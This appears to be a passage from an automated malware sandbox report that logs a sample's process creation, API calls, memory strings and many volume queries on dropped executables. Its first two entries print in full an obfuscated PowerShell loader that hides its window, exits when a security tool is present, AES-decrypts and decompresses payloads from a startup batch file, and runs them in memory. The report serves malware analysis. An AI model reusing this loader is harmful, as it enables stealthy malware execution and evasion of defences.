Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo $host.ui.rawui.windowtitle='c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\mypayload.bat';$cvim='entfexgrypfexgoinfexgtfexg'.replace('fexg', ''),'eleixmomeixmontixmoaixmotixmo'.replace('ixmo', ''),'decoszeomoszeproszeeoszesoszesosze'.replace('osze', ''),'cpuxvoppuxvytpuxvopuxv'.replace('puxv', ''),'rywrpeaywrpdlywrpiywrpnesywrp'.replace('ywrp', ''),'cgarcrgarcegarcategarcdgarcecgarcrgarcypgarctgarcorgarc'.replace('garc', ''),'loivflaivfldivfl'.replace('ivfl', ''),'chagsqknggsqkeegsqkxtgsqkegsqknsgsqkiogsqkngsqk'.replace('gsqk', ''),'maaauaiaaaunaaaumodaaauulaaaueaaau'.replace('aaau', ''),'spojxflitojxf'.replace('ojxf', ''),'ifgbonvfgbookfgboefgbo'.replace('fgbo', ''),'gevsbgtcuvsbgrrvsbgevsbgntvsbgprvsbgovsbgcevsbgsvsbgsvsbg'.replace('vsbg', ''),'trusbuansusbuforusbumusbufiusbunausbulbusbulusbuockusbu'.replace('usbu', ''),'friyufoiyufmiyufbaiyufse6iyuf4stiyufriniyufgiyuf'.replace('iyuf', '');powershell -w hidden;$modules=[system.diagnostics.process]::($cvim[11])().modules;if ($modules -match 'hmpalert.dll') { exit; };function dsolp($wsuto){$fdrhp=[system.security.cryptography.aes]::create();$fdrhp.mode=[system.security.cryptography.ciphermode]::cbc;$fdrhp.padding=[system.security.cryptography.paddingmode]::pkcs7;$fdrhp.key=[system.convert]::($cvim[13])('0l3qu7et4bhk3wbvagfjicwz8cespcifojtqhmr81xg=');$fdrhp.iv=[system.convert]::($cvim[13])('jifnsdytrqtk8ftun6ogsw==');$qwyhd=$fdrhp.($cvim[5])();$funrp=$qwyhd.($cvim[12])($wsuto,0,$wsuto.length);$qwyhd.dispose();$fdrhp.dispose();$funrp;}function mmhqh($wsuto){$zzdvj=new-object system.io.memorystream(,$wsuto);$rzpai=new-object system.io.memorystream;$bbtac=new-object system.io.compression.gzipstream($zzdvj,[io.compression.compressionmode]::($cvim[2]));$bbtac.($cvim[3])($rzpai);$bbtac.dispose();$zzdvj.dispose();$rzpai.dispose();$rzpai.toarray();}$zledh=[system.io.file]::($cvim[4])([console]::title);$qkjpw=mmhqh (dsolp ([convert]::($cvim[13])([system.linq.enumerable]::($cvim[1])($zledh, 5).substring(2))));$gxzxu=mmhqh (dsolp ([convert]::($cvim[13])([system.linq.enumerable]::($cvim[1])($zledh, 6).substring(2))));[system.reflection.assembly]::($cvim[6])([byte[]]$gxzxu).($cvim[0]).($cvim[10])($null,$null);[system.reflection.assembly]::($cvim[6])([byte[]]$qkjpw).($cvim[0]).($cvim[10])($null,$null); "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo $host.ui.rawui.windowtitle='c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\mypayload.bat';$cvim='entfexgrypfexgoinfexgtfexg'.replace('fexg', ''),'eleixmomeixmontixmoaixmotixmo'.replace('ixmo', ''),'decoszeomoszeproszeeoszesoszesosze'.replace('osze', ''),'cpuxvoppuxvytpuxvopuxv'.replace('puxv', ''),'rywrpeaywrpdlywrpiywrpnesywrp'.replace('ywrp', ''),'cgarcrgarcegarcategarcdgarcecgarcrgarcypgarctgarcorgarc'.replace('garc', ''),'loivflaivfldivfl'.replace('ivfl', ''),'chagsqknggsqkeegsqkxtgsqkegsqknsgsqkiogsqkngsqk'.replace('gsqk', ''),'maaauaiaaaunaaaumodaaauulaaaueaaau'.replace('aaau', ''),'spojxflitojxf'.replace('ojxf', ''),'ifgbonvfgbookfgboefgbo'.replace('fgbo', ''),'gevsbgtcuvsbgrrvsbgevsbgntvsbgprvsbgovsbgcevsbgsvsbgsvsbg'.replace('vsbg', ''),'trusbuansusbuforusbumusbufiusbunausbulbusbulusbuockusbu'.replace('usbu', ''),'friyufoiyufmiyufbaiyufse6iyuf4stiyufriniyufgiyuf'.replace('iyuf', '');powershell -w hidden;$modules=[system.diagnostics.process]::($cvim[11])().modules;if ($modules -match 'hmpalert.dll') { exit; };function dsolp($wsuto){$fdrhp=[system.security.cryptography.aes]::create();$fdrhp.mode=[system.security.cryptography.ciphermode]::cbc;$fdrhp.padding=[system.security.cryptography.paddingmode]::pkcs7;$fdrhp.key=[system.convert]::($cvim[13])('0l3qu7et4bhk3wbvagfjicwz8cespcifojtqhmr81xg=');$fdrhp.iv=[system.convert]::($cvim[13])('jifnsdytrqtk8ftun6ogsw==');$qwyhd=$fdrhp.($cvim[5])();$funrp=$qwyhd.($cvim[12])($wsuto,0,$wsuto.length);$qwyhd.dispose();$fdrhp.dispose();$funrp;}function mmhqh($wsuto){$zzdvj=new-object system.io.memorystream(,$wsuto);$rzpai=new-object system.io.memorystream;$bbtac=new-object system.io.compression.gzipstream($zzdvj,[io.compression.compressionmode]::($cvim[2]));$bbtac.($cvim[3])($rzpai);$bbtac.dispose();$zzdvj.dispose();$rzpai.dispose();$rzpai.toarray();}$zledh=[system.io.file]::($cvim[4])([console]::title);$qkjpw=mmhqh (dsolp ([convert]::($cvim[13])([system.linq.enumerable]::($cvim[1])($zledh, 5).substring(2))));$gxzxu=mmhqh (dsolp ([convert]::($cvim[13])([system.linq.enumerable]::($cvim[1])($zledh, 6).substring(2))));[system.reflection.assembly]::($cvim[6])([byte[]]$gxzxu).($cvim[0]).($cvim[10])($null,$null);[system.reflection.assembly]::($cvim[6])([byte[]]$qkjpw).($cvim[0]).($cvim[10])($null,$null); "

Source: C:\Windows\System32\dialer.exe

Code function: 47_2_0000000140001B54 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,

47_2_0000000140001B54

Source: C:\Windows\System32\dialer.exe

Code function: 47_2_0000000140001B54 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,

47_2_0000000140001B54

Source: winlogon.exe, 00000032.00000000.79029014986.0000020E8FF60000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program ManagerAg
Source: winlogon.exe, 00000032.00000000.79029014986.0000020E8FF60000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: winlogon.exe, 00000032.00000000.79029014986.0000020E8FF60000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: skotes.exe, skotes.exe, 00000003.00000002.78404530812.0000000000450000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: TProgram Manager
Source: winlogon.exe, 00000032.00000000.79029014986.0000020E8FF60000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\System32\svchost.exe

Code function: 14_2_0000028559F036F0 cpuid

14_2_0000028559F036F0

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1073578041\tYliuwV.ps1 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1073867001\UN8QxIq.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1073867001\UN8QxIq.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1073896001\ViGgA8C.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1073896001\ViGgA8C.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1073975001\WveK4j1.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1073975001\WveK4j1.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1074030001\bb6a39dc63.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1074030001\bb6a39dc63.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1074031021\am_no.cmd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1074040001\439c2c3c87.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1074040001\439c2c3c87.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1074041001\23a60cad74.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1074041001\23a60cad74.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1074042001\4fc87a30ef.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1074042001\4fc87a30ef.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1074043001\6b4a3eee23.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1074044001\1038363cd2.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1074044001\1038363cd2.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1074045001\b73119c98d.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1074045001\b73119c98d.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1074046001\62aa2588e0.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1074046001\62aa2588e0.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-US~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe VolumeInformation
